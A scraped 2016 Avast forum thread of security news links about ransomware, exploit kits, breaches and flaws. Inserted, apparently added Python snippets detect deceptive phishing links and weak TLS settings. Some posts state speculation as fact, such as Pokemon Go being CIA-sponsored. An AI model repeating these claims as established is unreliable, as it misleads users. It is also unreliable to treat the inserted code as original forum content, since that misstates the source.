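    """Collect (href, visible text) pairs from <a> elements."""

    def __init__(self) -> None:
        super().__init__()
        self.anchors: List[Tuple[str, str]] = []
        self._href: Optional[str] = None
        self._text: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.anchors.append((self._href, "".join(self._text).strip()))
            self._href = None


def registrable_part(host: str) -> str:
    """Last two labels of a host; a public-suffix list would be more precise."""
    labels = host.lower().strip(".").split(".")
    return ".".join(labels[-2:])


def mismatched_links(html: str) -> List[Tuple[str, str, str]]:
    """Return (visible_text, shown_host, real_host) for every deceptive anchor."""
    p = AnchorCollector()
    p.feed(html)
    results: List[Tuple[str, str, str]] = []
    for href, text in p.anchors:
        m = URL_IN_TEXT.search(text)
        if not m:
            continue  # plain words like "Help" make no claim about a host
        shown = m.group(1)
        real = urlparse(href).hostname or ""
        if registrable_part(shown) != registrable_part(real):
            results.append((text, shown, real))
    return results


if __name__ == "__main__":
    for text, shown, real in mismatched_links(SAMPLE_MAIL_HTML):
        print(f"link text claims {shown!r} but points to {real!r}: {text}")
```

Fed the mail body as HTML, it reports the single deceptive anchor and stays quiet about the genuine avast.com links; that one check would have caught this mail before anyone had to compare URLs by hand.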
-
@ mismac
This topic is more of an informative one rather than a specific system related issue. So really should be in its own topic.
That said there is another topic on this scam/phishing attempt, see https://forum.avast.com/index.php?topic=187151.0 and whatever you do don't go clicking any links on this email.
-
Another Day, Another Hack: User Accounts of Dating Site Badoo
http://motherboard.vice.com/en_uk/read/another-day-another-hack-user-accounts-of-dating-site-badoo
-
ANGLER EXPLOIT KIT EVADING EMET
https://www.fireeye.com/blog/threat-research/2016/06/angler_exploit_kite.html
We recently encountered some exploits from Angler Exploit Kit (EK) that are completely evading Microsoft’s Enhanced Mitigation Experience Toolkit (EMET). This is something we are seeing for the first time in the wild, and we only observed it affecting systems running Windows 7.
http://www.scmagazine.com/fireeye-finds-angler-evading-microsoft-emet-on-windows-7/article/501244/
-
Twitter - Keeping your account safe
https://blog.twitter.com/2016/keeping-your-account-safe
-
Would you like them to hack your IoT devices? What if the NSA could hack into your pacemaker, your smart fridge etc.
Read: https://www.recode.net/2016/6/11/11906856/nsa-spying-hacker-internet-of-things
Hackers like this and now seemingly the surveillance state is interested too.
polonus
-
Netgear D6000 and D3600 contain hard-coded cryptographic keys and are vulnerable to authentication bypass
http://www.kb.cert.org/vuls/id/778696
-
Interesting read on how stuff works ... I guess it is similar over at avast lab
What’s The Deal With Threat Intelligence
https://labsblog.f-secure.com/2016/06/14/whats-the-deal-with-threat-intelligence/
Data analysis provides us with technical threat intelligence that we use to drive day-to-day activities. Our back ends process hundreds of gigabytes of data on a daily basis.
Something to think about for those that are impatient about detection being added to samples ... @Be Secure ;)
-
Microsoft Security Bulletin Summary for June 2016
https://technet.microsoft.com/en-us/library/security/ms16-jun
-
Adobe Security Bulletin - Security updates available for Adobe Flash Player
https://helpx.adobe.com/security/products/flash-player/apsb16-18.html
-
T-Mobile Czech Republic ‘suffers data leak’
Over 1.5 million customer records at T-Mobile Czech Republic were stolen by one of its employees, according to local media.
In an official statement, T-Mobile admitted that an incident has taken place but refused to confirm the scale or provide details about what information, if any, was leaked.
It said that due to an ongoing police investigation, it is “unable to provide any additional specific information”.
Based on the fact that the investigation has been handed over to the Czech Police’s Unit for Combating Organized Crime, speculation has arisen in Czech media that the data leak has been massive.
It probably involved all 1.5 million T-Mobile customers, making it the largest known data breach ever in the Czech Republic.
http://www.welivesecurity.com/2016/06/17/t-mobile-czech-republic-suffers-data-leak/
-
Fresh hell for TalkTalk customers: TeamView trap unleashed
http://www.theregister.co.uk/2016/06/13/talktalk_teamviewer_customer_scam/
-
GitHub Security Update: Reused password attack
https://github.com/blog/2190-github-security-update-reused-password-attack
-
GoToMyPC Password Issues
http://status.gotomypc.com/incidents/s2k8h1xhzn4k
-
Retefe banking Trojan targets UK banking customers
https://blog.avast.com/retefe-banking-trojan-targets-uk-banking-customers
-
WordPress 4.5.3 Maintenance and Security Release
https://wordpress.org/news/2016/06/wordpress-4-5-3/
-
MIRCOP Ransomware Poses as Robbed Anonymous Member
A new strain of ransomware named MIRCOP poses as a robbed member of the Anonymous hacker group, asking users to give money back or have their files locked forever.
MIRCOP is one of the non-standard ransomware families that deviate from the regular modus operandi that most ransomware variants follow these days.
http://news.softpedia.com/news/mircop-ransomware-poses-as-robbed-anonymous-member-505677.shtml
-
Finding an ATM Skimmer: It pays to be paranoid!
https://www.linkedin.com/pulse/finding-atm-skimmer-pays-paranoid-benjamin-tedesco-gcih-pmp
-
Nuclear Exploit Kit Shuts Down As Researchers Probe Its Infrastructure
http://news.softpedia.com/news/nuclear-exploit-kit-shuts-down-as-researchers-probe-its-infrastructure-505696.shtml
Even before the Angler Exploit Kit (EK) shut down operations towards the end of May and start of June, the Nuclear Exploit Kit was dead and gone, according to multiple sources in the security industry.
The Nuclear EK was one of the biggest sources of ransomware infections, being notorious for delivering the Locky ransomware, among many other threats.
The exploit kit was always popular, being one of the top five exploits kits in usage, but around April 30, multiple sources say they stopped seeing any type of activity from Nuclear's infrastructure as if someone had pulled the plug and never returned.
-
MIRCOP Ransomware Poses as Robbed Anonymous Member
A new strain of ransomware named MIRCOP poses as a robbed member of the Anonymous hacker group, asking users to give money back or have their files locked forever.
MIRCOP is one of the non-standard ransomware families that deviate from the regular modus operandi that most ransomware variants follow these days.
http://news.softpedia.com/news/mircop-ransomware-poses-as-robbed-anonymous-member-505677.shtml
http://blog.trendmicro.com/trendlabs-security-intelligence/instruction-less-ransomware-mircop-channels-guy-fawkes/
-
Why Ransomware Works: Arrival Tactics
http://blog.trendmicro.com/trendlabs-security-intelligence/ransomware-arrival-methods/
-
ohooo :o
Google Found Disastrous Symantec and Norton Vulnerabilities That Are 'As Bad As It Gets'
http://fortune.com/2016/06/29/symantec-norton-vulnerability/
http://arstechnica.com/security/2016/06/25-symantec-products-open-to-wormable-attack-by-unopened-e-mail-or-links/
https://googleprojectzero.blogspot.no/2016/06/how-to-compromise-enterprise-endpoint.html
https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160628_00
https://bugs.chromium.org/p/project-zero/issues/list?q=label:Vendor-Symantec
-
ohooo :o
Google Found Disastrous Symantec and Norton Vulnerabilities That Are 'As Bad As It Gets'
http://fortune.com/2016/06/29/symantec-norton-vulnerability/
http://arstechnica.com/security/2016/06/25-symantec-products-open-to-wormable-attack-by-unopened-e-mail-or-links/
https://googleprojectzero.blogspot.no/2016/06/how-to-compromise-enterprise-endpoint.html
https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160628_00
https://bugs.chromium.org/p/project-zero/issues/list?q=label:Vendor-Symantec
I think my recommended protection is much better: http://bob3160.blogspot.com/2016/06/heres-my-version-of-best-security.html
-
ohooo :o
Google Found Disastrous Symantec and Norton Vulnerabilities That Are 'As Bad As It Gets'
http://fortune.com/2016/06/29/symantec-norton-vulnerability/
http://arstechnica.com/security/2016/06/25-symantec-products-open-to-wormable-attack-by-unopened-e-mail-or-links/
https://googleprojectzero.blogspot.no/2016/06/how-to-compromise-enterprise-endpoint.html
https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160628_00
https://bugs.chromium.org/p/project-zero/issues/list?q=label:Vendor-Symantec
I think my recommended protection is much better: http://bob3160.blogspot.com/2016/06/heres-my-version-of-best-security.html
I think my recommended protection is much better than Bob's: Avast! Free Antivirus + Sandboxie Free + Windows Firewall + Winpatrol Free + Malwarebytes Anti-Malware Free + Zemana AntiMalware Free + Unchecky + Malwarebytes Anti-Exploit Free + MCShield
-
200 k+ parked/expired domains abused to launch malvertised ads.
One of the biggest ongoing problems online,
remedied like when "shutting the stable door after the horse has bolted".
Re: https://blog.sucuri.net/2016/06/spam-via-expired-domains.html
So malvertisers are even sinkholing to distribute their malvertised ads.
Seems because some won't discriminate between a legit and a fraudulent click. >:( :(
Read: https://blog.sucuri.net/2016/06/spam-via-expired-domains.html
pol
-
Why Remote Desktop needs to be disabled: http://blog.emsisoft.com/2016/06/29/apocalypse-ransomware-which-targets-companies-through-insecure-rdp/
-
Top Russian Site Exposes Millions to Info-Stealing Malware
http://www.infosecurity-magazine.com/news/top-russian-site-exposes-millions/
-
IoT hell started : https://threatpost.com/lizardstresser-iot-botnet-part-of-400gbps-ddos-attacks/119006/
aka every damn item in household and office with internet will become abused for DDOS ...
more with cameras https://threatpost.com/botnet-powered-by-25000-cctv-devices-uncovered/118948/
before with routers https://threatpost.com/lizard-squads-ddos-for-hire-service-built-on-hacked-home-routers/110341/
-
"The enemy is listening" (Feind hört mit): EU seeks paid web-trolls:
http://www.telegraph.co.uk/news/worldnews/europe/eu/9845442/EU-to-set-up-euro-election-troll-patrol-to-tackle-Eurosceptic-surge.html
polonus
-
Possibly millions of computers insecure due to a UEFI bug
http://www.theregister.co.uk/2016/07/04/lenovo_scrambling_to_get_a_fix_for_bios_vuln/
-
First came Petya, now comes Satana. Hope Avast is ready:
https://blog.malwarebytes.com/threat-analysis/2016/06/satana-ransomware/
-
Locky ransomware starts up its illegal activity of stealing money from its victims again, after a temporary inactivity since the end of May. Hope Avast! is ready:
http://securityaffairs.co/wordpress/48725/malware/locky-ransomware-back.html
-
Zepto Ransomware Soars
http://www.infosecurity-magazine.com/news/zepto-ransomware-soars/
Hope Avast! is ready.
-
Rather late US alerts for Symantec and Norton flaws.
Re: https://www.us-cert.gov/ncas/alerts/TA16-187A
European alerts already came on June 29th.
Surveillance and other interests over security?
Citizens today are a big nuisance factor for Big Gov and Big Corp? :o
polonus
-
Rather late US alerts for Symantec and Norton flaws.
Re: https://www.us-cert.gov/ncas/alerts/TA16-187A
European alerts already came on June 29th.
Surveillance and other interests over security?
Citizens today are a big nuisance factor for Big Gov and Big Corp? :o
polonus
https://forum.avast.com/index.php?topic=52252.msg1322132#msg1322132
-
New Alfa, or Alpha Ransomware from the same devs as Cerber
Security researcher BloodDolly recently discovered a new file encrypter called Alfa Ransomware, or Alpha Ransomware, which is from the developers of Cerber. As BloodDolly is still currently analyzing this ransomware, not much is known about this ransomware at this time. Preliminary reports, though, indicate that files encrypted by Alfa Ransomware are not decryptable.
http://www.bleepingcomputer.com/news/security/new-alfa-or-alpha-ransomware-from-the-same-devs-as-cerber/ Hope avast! is ready for this when it comes.
-
Were you affected by the Trillian blog and forum Data Breach Security Incident?
Read: https://www.trillian.im/help/trillian-blog-and-forums-security-incident/
pol
-
CryptXXX Ransomware Updated. Avast! needs to gear up the Ransomware protection.
https://isc.sans.edu/forums/diary/CryptXXX+ransomware+updated/21229
Update: Avast! successfully blocks it. :)
-
CryptXXX Ransomware Updated. Avast! needs to gear up the Ransomware protection.
https://isc.sans.edu/forums/diary/CryptXXX+ransomware+updated/21229
Update: Avast! successfully blocks it. :)
The important part of this post is:
Update:Avast! successfully blocks it.
-
Oops! TP-Link forgets to Renew and Loses its Domains Used to Configure Router Settings
http://thehackernews.com/2016/07/tp-link-router-setting.html
-
Could antivirus software make your computer less safe? Antivirus software is 'increasingly useless' and may make your computer less safe
http://www.cbc.ca/news/technology/antivirus-software-1.3668746?cmp=rss&cid=news-digests-canada-and-world-morning
-
Could antivirus software make your computer less safe? Antivirus software is 'increasingly useless' and may make your computer less safe
http://www.cbc.ca/news/technology/antivirus-software-1.3668746?cmp=rss&cid=news-digests-canada-and-world-morning
This article has been quoted before and isn't any more intelligent in its diagnosis now than when it was first posted in this forum. :(
-
Could antivirus software make your computer less safe? Antivirus software is 'increasingly useless' and may make your computer less safe
http://www.cbc.ca/news/technology/antivirus-software-1.3668746?cmp=rss&cid=news-digests-canada-and-world-morning
This article has been quoted before and isn't any more intelligent in its diagnosis now than when it was first posted in this forum. :(
I think the whole idea of your AV making you less safe - the idea that you are safer without an AV is ridiculous.
-
Hi bob3160 and DavidR and BeSecure,
All forms of protection are being attacked once in a while using similar bogus arguments. The one time it is AV, another time it is script blocking.
The argument often heard is that it slows down the computer. Well it is an infection of sorts that really may slow down your computer or even bring it to a standstill or ruin it to "doorstopper status only". Script blocking may even make your browser act faster as there is less script to be loaded.
polonus
-
Hi bob3160 and DavidR and BeSecure,
All forms of protection are being attacked once in a while using similar bogus arguments. The one time it is AV, another time it is script blocking.
The argument often heard is that it slows down the computer. Well it is an infection of sorts that really may slow down your computer or even bring it to a standstill or ruin it to "doorstopper status only". Script blocking may even make your browser act faster as there is less script to be loaded.
polonus
Any way you slice it, the author is trying to make an uninformed point.
-
Apple devices held for ransom, rumors claim 40M iCloud accounts hacked
http://www.csoonline.com/article/3093016/security/apple-devices-held-for-ransom-rumors-claim-40m-icloud-accounts-hacked.html
-
GootKit Banking Trojan Receives Massive Update
http://news.softpedia.com/news/gootkit-banking-trojan-receives-massive-update-506181.shtml
-
Pokemon-Go app built by a firm sponsored by the CIA, read:
https://www.theguardian.com/technology/2016/jul/11/pokemon-go-privacy-security-full-access-google-account
Could be a means for CIA surveillance spooks to get a royal way into your smartphone
through such new technology sponsored by them.
polonus
-
Pokemon-Go app built by a firm sponsored by the CIA, read:
https://www.theguardian.com/technology/2016/jul/11/pokemon-go-privacy-security-full-access-google-account
Could be a means for CIA surveillance spooks to get a royal way into your smartphone
through such new technology sponsored by them.
polonus
Not mine, no games. I leave that to the kids, grand kids and great grand kids. This sly old fox knows better. :)
-
Hi bob3160,
For the smart kiddie at your home who insists on playing the game.
Make it scare-free, safe and with security in mind, some tips:
play it on a cheap second phone, turn the real smartphone into a wifi-hotspot, set a VPN,
and play the game from the cheap one on a fake Google account.
No abuse there. By the way, if there is a satan, he doesn't bother with contracts in blood,
but simply has you accept his permissions in the Google Play store. ;D
Info credits leocusmus.
pol
-
Nasty hole in WordPress plug-in patched: http://www.theregister.co.uk/2016/07/12/nasty_session_stealing_hole_filled_in_wordpress_all_in_one_seo_plugin/
pol
-
SCADA malware caught infecting European energy company
http://www.theregister.co.uk/2016/07/12/scada_malware/
-
Nymaim Ransomware-Downloader Spikes Big
http://www.infosecurity-magazine.com/news/nymaim-ransomware-deliverer-spikes/
Hope Avast! is ready for this ransomware
-
A new high for Locky
https://labsblog.f-secure.com/2016/07/13/a-new-high-for-locky/
-
Microsoft Security Bulletin Summary for July 2016
https://technet.microsoft.com/library/security/ms16-jul
-
Microsoft wins federal appeal over warrants for data held outside US
https://www.rt.com/usa/351052-microsoft-emails-ireland-server/
-
Avast Sandbox has a flaw of allowing access to the file system. This could allow ransomware to encrypt files even if it is running in the sandbox, the writeup I found online is here:
http://seclists.org/fulldisclosure/2016/Apr/68
-
Avast Sandbox has a flaw of allowing access to the file system. This could allow ransomware to encrypt files even if it is running in the sandbox, the writeup I found online is here:
http://seclists.org/fulldisclosure/2016/Apr/68
This is pretty old in security terms and related to Avast Free/Pro/IS/Premier versions, 11.x.x and even earlier for the Endpoint Protection versions 8.x.x.
Given that the latest versions of Avast Free/Pro/IS/Premier are at 12.1.x, it would have to be confirmed whether this is still in effect or resolved in the later versions.
-
Energy Grid Malware Bypasses Cyber and Physical Security
"Security researchers have discovered new malware designed to bypass traditional physical and cybersecurity which could be used in an attack to shut down an energy grid."
https://sentinelone.com/blogs/sfg-furtims-parent/
-
Trillian Blog and Forums Security Incident
https://www.trillian.im/help/trillian-blog-and-forums-security-incident/
-
Ubuntu Forums Hacked, 2 Million Users’ Details Stolen
http://www.omgubuntu.co.uk/2016/07/ubuntu-forums-hacked-2-million-usernames-stolen
http://distrowatch.com/dwres.php?resource=showheadline&story=946
-
New version of Petya Released. Fixes bug in Encryption Algorithm
http://www.bleepingcomputer.com/news/security/new-version-of-petya-released-fixes-bug-in-encryption-algorithm/
A new version of the Petya disc-encrypting ransomware has been released that fixes a bug that previously caused some weakness in its encryption algorithm. According to Hasherezade, a security analyst for Malwarebytes, prior versions of the Petya ransomware were not properly implementing the Salsa20 encryption algorithm, which was used by the ransomware to encrypt the drive and for verifying that a correct ransom key was entered.
With this new version, the Petya developer's implementation of the Salsa20 algorithm has been fixed, which removes the previously exploitable weaknesses.
Hope Avast! is ready for this ransomware.
-
Seems a concerted action against Tor ongoing: https://trac.torproject.org/projects/tor/ticket/19690
pol
-
Seeing a lot of examples where CloudFlare enabled websites won't resolve DNS.
Example found lately: https://sritest.io/
I get an Error 1001 Ray ID: 2c48982096d52c78 • 2016-07-18 20:14:28 UTC
DNS resolution error
Do not see a reverse DNS here: http://toolbar.netcraft.com/site_report?url=https://sritest.io
Also see here: http://www.dnsinspect.com/sritest.io/1468872908
Issue with the Comodo Certificate although it has been installed properly: sritest.io
This is not a Symantec certificate.
Please contact the Certificate Authority for further verification.
This server cannot be scanned for these vulnerabilities:
Heartbleed. See possible causes.
Poodle (TLS). See possible causes.
Info
BEAST
The BEAST attack is not mitigated on this server.
Certificate information
This server uses a Domain Validated (DV) certificate. No information about the site owner has been validated. Data is protected, but exchanging personal or financial information is not recommended.
Common name:
sni154156.cloudflaressl.com
SAN:
sni154156.cloudflaressl.com, *.alexamaster.com, *.denisha.review, *.funnelproducer.com, *.garnettrowand.xyz, *.ouemceeii.cf, *.platypuslovescrypto.party, *.privacyforjournalists.org.au, *.savingnh.com, *.sifoilxi.cf, *.skachat-besplatno-balloon.accountant, *.sritest.io, *.superagency.ru, *.tadra.us, *.thingsandservices.com, *.whitehatmatrix.com, alexamaster.com, denisha.review, funnelproducer.com, garnettrowand.xyz, ouemceeii.cf, platypuslovescrypto.party, privacyforjournalists.org.au, savingnh.com, sifoilxi.cf, skachat-besplatno-balloon.accountant, sritest.io, superagency.ru, tadra.us, thingsandservices.com, whitehatmatrix.com
Valid from:
2016-Jul-18 00:00:00 GMT
Valid to:
2017-Jan-22 23:59:59 GMT
Certificate status:
Valid
Revocation check method:
OCSP
Organization:
Organizational unit:
PositiveSSL Multi-Domain,Domain Control Validated
City/locality:
State/province:
Country:
Certificate Transparency:
Not embedded in certificate
Serial number:
2edd615acf8a11663b75fe0037e2d6d7
Algorithm type:
SHA256withECDSA
Key size:
256
Certificate chain
COMODO ECC Certification Authority (Intermediate certificate)
COMODO ECC Domain Validation Secure Server CA 2 (Intermediate certificate)
sni154156.cloudflaressl.com (Tested certificate)
Server configuration
Host name:
104.24.122.240
Server type:
cloudflare-nginx
IP address:
104.24.122.240
Port number:
443
Protocols enabled:
TLS1.2
TLS1.1
TLS1.0
Protocols not enabled:
SSLv3
SSLv2
Secure Renegotiation:
Enabled
Downgrade attack prevention:
Enabled
Next Protocol Negotiation:
Enabled
Session resumption (caching):
Enabled
Session resumption (tickets):
Enabled
Strict Transport Security (HSTS):
Not Enabled
SSL/TLS compression:
Not Enabled
Heartbeat (extension):
Not Enabled
RC4:
Not Enabled
OCSP stapling:
Not Enabled
comodo scan gives: E-commerce Safety Information
Transaction Protection
Analysis has failed to complete. Sorry, The connection timed out before all (any?) content was returned! (Note: As a part of their security measures some shared hosting services will block this type of tool from scanning the sites they host. -- some things to try
Scripts resolve normally: https://seomon.com/domain/sritest.io/performance/
Just does not like the oversight at these large cloud bulk hosters (my remark - pol).
Is this because of recently found cgi vulnerabilities in certain applications, and has this to be mitigated? Anyone?
polonus (volunteer website security analyst and website error-hunter)
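The scan report above lists each server setting as a label line followed by its value, which makes it easy to check automatically for the weak settings a reviewer would flag (HSTS and OCSP stapling not enabled, legacy protocol versions still offered). The following is an added example, not from the post or from any scanning tool: a small parser for that label/value layout plus a checker that compares the parsed values against a set of expected secure values. The sample report embedded in it is constructed from the fields quoted above, and the expected values are my own choice of baseline, not anything the scanner defines.

```python
"""Parse a label/value scan report and flag weak TLS server settings.

Added example: parses the alternating "Label:" / value layout shown in the
scan output quoted in the post and reports mismatches against a baseline.
The report text and the baseline are constructed for this example.
"""

# Constructed sample, trimmed to the server-configuration fields of the post.
SAMPLE_REPORT = """\
Protocols enabled:
TLS1.2
TLS1.1
TLS1.0
Protocols not enabled:
SSLv3
SSLv2
Secure Renegotiation:
Enabled
Downgrade attack prevention:
Enabled
Strict Transport Security (HSTS):
Not Enabled
SSL/TLS compression:
Not Enabled
Heartbeat (extension):
Not Enabled
RC4:
Not Enabled
OCSP stapling:
Not Enabled
"""

# Baseline (my assumption, not the scanner's): the value each single-valued
# setting should have; any other value becomes a finding.
EXPECTED = {
    "Strict Transport Security (HSTS)": "Enabled",
    "OCSP stapling": "Enabled",
    "Secure Renegotiation": "Enabled",
    "Downgrade attack prevention": "Enabled",
    "SSL/TLS compression": "Not Enabled",
    "Heartbeat (extension)": "Not Enabled",
    "RC4": "Not Enabled",
}

# Protocol versions that should no longer be offered at all.
LEGACY_PROTOCOLS = {"SSLv2", "SSLv3", "TLS1.0", "TLS1.1"}


def parse_report(text):
    """Turn "Label:" lines followed by value lines into a dict of lists.

    A label is a line ending in ':'; every non-empty line after it, up to the
    next label, is one value of that label (so multi-line lists like
    "Protocols enabled:" keep all their entries).
    """
    result = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.endswith(":"):
            current = line[:-1]
            result[current] = []
        elif current is not None:
            result[current].append(line)
    return result


def findings(report):
    """Return human-readable findings for every setting that misses the baseline."""
    out = []
    for key, expected in EXPECTED.items():
        actual = report.get(key, [])
        if actual and actual[0] != expected:
            out.append(f"{key}: {actual[0]} (expected {expected})")
    for proto in report.get("Protocols enabled", []):
        if proto in LEGACY_PROTOCOLS:
            out.append(f"Legacy protocol enabled: {proto}")
    return out


def check_sample():
    """Run the checker over the constructed sample report."""
    return findings(parse_report(SAMPLE_REPORT))


if __name__ == "__main__":
    for line in check_sample():
        print(line)
```

On the constructed sample this reports HSTS and OCSP stapling as not enabled and TLS1.0 and TLS1.1 as legacy protocols still offered, which matches what a reviewer would pick out of the quoted report by hand; the baseline dictionary is the place to adjust for a different policy.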
-
Work-arounds for particular server applications exist: https://httpoxy.org/ - read -> https://www.kb.cert.org/vuls/id/797896
polonus
-
Lot of tracking going on in my Google Chrome Browser:
We found 38 data collectors in Chrome tracking, saving and often selling your browsing.
Here is a list of the trackers we found (data collectors, ad networks, widgets & others):
AdF.ly Adzerk Alexa bitly
Google Disqus DoubleClick Feedjit
Flattr Foursquare Imgur Impact Radius
LinkedIn Marin Software Microsoft adCenter Microsoft
Netmining Omniture (Adobe) Pinterest Po.st
Mail.ru Reddit Sanoma ShareASale
Skimbit Ltd SoundCloud TradeDoubler Twitter
Tynt UserVoice Vkontakte Yandex
Zippyshare Platform161 MixPanel Taboola
Wordpress Olark
How to keep them at bay?
polonus
-
How does this affect Avast ???
http://www.theregister.co.uk/2016/07/20/hooks_cooked_hackers_crack_tonnes_of_security_apps_for_new_cloak_yoke/
-
How does this affect Avast ???
http://www.theregister.co.uk/2016/07/20/hooks_cooked_hackers_crack_tonnes_of_security_apps_for_new_cloak_yoke/
I've found my own answer:
EnSilo identified affected products from AVG, Kaspersky Lab, McAfee/Intel Security, Symantec, Trend Micro, Bitdefender, Citrix, Webroot, Avast, Emsisoft and Vera Security.
Now the question is how quickly will this get patched ???
-
Oracle Critical Patch Update Advisory - July 2016
http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html
-
Chinese authorities want to ban adblockers from September onwards:
https://adblockplus.org/blog/the-lonely-bully-china-issues-edict-to-ban-ad-blockers
polonus
-
Chinese authorities want to ban adblockers from September onwards:
https://adblockplus.org/blog/the-lonely-bully-china-issues-edict-to-ban-ad-blockers
polonus
Irony of ironies when the country that blocks mega quantities of data would want to block a blocker :P
-
Chinese authorities want to ban adblockers from September onwards:
https://adblockplus.org/blog/the-lonely-bully-china-issues-edict-to-ban-ad-blockers
polonus
so, this is the reason why a Chinese company bought Opera ...
guess that new innovative feature goes bust in a month
-
so, this is the reason why a Chinese company bought Opera ...
http://www.reuters.com/article/us-opera-software-m-a-china-idUSKCN0ZY0CA
-
that was the first offer for 1.2 billion, which failed
the second offer is already ongoing and it's what I'm talking about (the 600 million one)
they are still buying the browsers if it goes through ...
-
MS-ISAC official: Ransomware top priority
http://www.scmagazine.com/gov-agencies-beware-malware-infections-peaked-at-450-per-month/article/511381/
-
New attack bypasses HTTP protection. Danger imminent on open Wifi platforms
re: http://arstechnica.com/security/2016/07/new-attack-that-cripples-https-crypto-works-on-macs-windows-and-linux/
polonus
-
New attack bypasses HTTP protection. Danger imminent on open Wifi platforms
re: http://arstechnica.com/security/2016/07/new-attack-that-cripples-https-crypto-works-on-macs-windows-and-linux/
polonus
Open WiFi has its own insecurities, it really doesn't need any help. :)
-
Hi bob3160,
That is why we have avast mobile security to warn us
for such wifi Web Proxy Auto Discovery connections, that may pose a threat.
The Open Wifi "PAC-man" cannot eat (and/or steal) our data or maliciously redirect us.
polonus
-
Here is a reply from LastPass about the latest discovered vulnerability:
https://blog.lastpass.com/2016/07/lastpass-security-updates.html/
More about the vulnerability here:
http://www.theregister.co.uk/2016/07/27/zero_day_hole_can_pwn_millions_of_lastpass_users_who_visit_a_site/
How does Avast Password stack up ???
-
I quit using LastPass years ago during one of their other vulnerable moments. I have stuck with KeePass locally and have limited the browser extensions I use.
I'm glad Tavis is on it.
-
I quit using LastPass years ago during one of their other vulnerable moments. I have stuck with KeePass locally and have limited the browser extensions I use.
I'm glad Tavis is on it.
http://www.lifehacker.com.au/2016/06/keepass-vulnerability-lets-attackers-steal-passwords-but-dont-expect-it-to-be-patched/
-
I quit using LastPass years ago during one of their other vulnerable moments. I have stuck with KeePass locally and have limited the browser extensions I use.
I'm glad Tavis is on it.
http://www.lifehacker.com.au/2016/06/keepass-vulnerability-lets-attackers-steal-passwords-but-dont-expect-it-to-be-patched/
Nice. I am using the portable version 1.31.0.0 which checks for updates at startup (if checked). The article states 2.0 but I am going to turn off this update check right now.
I would also think that the redirection and unsigned/unknown file should be detected by avast.
Thanks
-
I quit using LastPass years ago during one of their other vulnerable moments. I have stuck with KeePass locally and have limited the browser extensions I use.
I'm glad Tavis is on it.
http://www.lifehacker.com.au/2016/06/keepass-vulnerability-lets-attackers-steal-passwords-but-dont-expect-it-to-be-patched/
please stop posting this, already been debunked as non-security issue and is used only by competing password managers to showcase 'insecurity' in the other free product
http://keepass.info/help/kb/sec_issues.html#updsig
and already not an issue in new version either ...
-
First we posted on the HTTPS URLs sniffing with malicious PAC files threat, now there is a solution that can be applied quite easily:
http://www.contextis.com/resources/blog/leaking-https-urls-20-year-old-vulnerability/
polonus
-
Deleted WhatsApp chats not gone from the database on your device.
Weird the chats in the database are not encrypted.
Read: http://www.zdziarski.com/blog/?p=6143
Certain restore Apps already able to recover deleted WhatsApp data: FonePaw/Reincubate
If you mean Privacy, do not use WhatsApp.
When you really want to lose the data, uninstall WhatsApp or use a complex back-up password.
Remember in these times and days, never entrust the Internet with private or other info you do not intend to share with the world.
The Internet never forgets and all your data will be there forever and a day.
Know that Google and others sit on that info and where it goes no one knows,
so it even might come to boomerang and bite you back.
Forewarned is forearmed,
polonus
-
Does Avast Mobile Security protect us against these 155 new trojaned apps from Google Play?
Read: https://news.drweb.com/show/?i=10115&lng=en&c=5
Anyone?
polonus
-
Kaspersky's apologies for ad that should not have been shown:
https://twitter.com/antireality/status/758998526990823426
polonus
-
Kaspersky's apologies for ad that should not have been shown:
https://twitter.com/antireality/status/758998526990823426
polonus
I'm surprised that they didn't try to rename Kaspersky to Cialis or Viagra ??? :)
-
Curiosity killed the proverbial animal aka how almost anybody could become a victim of phishing:
Read: https://www.blackhat.com/us-16/briefings.html#exploiting-curiosity-and-context-how-to-make-people-click-on-a-dangerous-link-despite-their-security-awareness
And that is why, my good forum friends, it is good I have avast online security beta extension installed in the browser.
Furthermore I report the baddies directly to avast, and also analyze them in the virus and worms section as a volunteer website security analyst
and website error-hunter.
Whenever I see something that is not alerted and should be blocked I use this extension in Google Chrome;
Block site 3.1.11
Stay focused and let Block Site automatically blocks websites of your choice. Best for procrastination problem
Id: eiimnmioipafcokbfikbljfdeojpcgbh Really like that one, just blocked flavors.me & subdomains as a SE redirector.
Next to that I work Bitdefender TrafficLight and also report blockables to WOT (under another nick).
Don't fall for it, folks, just think before opening that link. I always check and click, especially when coming there the first time around.
polonus
-
Drep detection whenever I download an executable from my own website. It is clean software I made myself, but why is this detection occurring? Can anybody tell me how to avoid it?
-
Drep detection whenever I download an executable from my own website. It is clean software I made myself, but why is this detection occurring? Can anybody tell me how to avoid it?
As you're a developer, read here:
-> https://www.avast.com/faq.php?article=AVKB229
-> https://www.avast.com/faq.php?article=AVKB228
-
Attention: Some Fosshub downloads compromised
http://www.ghacks.net/2016/08/03/attention-fosshub-downloads-compromised/
More :
http://news.softpedia.com/news/hacker-compromises-fosshub-to-distribute-mbr-hijacking-malware-506932.shtml
-
Cisco report says growing ransomware attacks are costing people and businesses millions
Cisco security researchers also discovered a sharp increase in HTTPS traffic related to malicious activity between September 2015 and March 2016. The increase is due in large part to malicious ad injectors and adware. (Bold is mine). Researchers also observed that even though major software vendors make patches available, many users failed to quickly install the patches, giving hackers plenty of time to exploit vulnerabilities.
http://www.bizjournals.com/sanjose/news/2016/08/01/cisco-report-says-growing-ransomware-attacks-are.html
-
HEIST
yet another attack vs HTTPS, this time also works vs HTTP/2
http://arstechnica.com/security/2016/08/new-attack-steals-ssns-e-mail-addresses-and-more-from-https-pages/
http://www.scmagazine.com/heist-attack-on-ssltls-can-grab-personal-info-black-hat/article/514203/
details https://tom.vg/papers/heist_blackhat2016.pdf
-
New Remcos RAT Available for Sale on Underground Hacking Forums
http://news.softpedia.com/news/new-remcos-rat-available-for-sale-on-underground-hacking-forums-507018.shtml
-
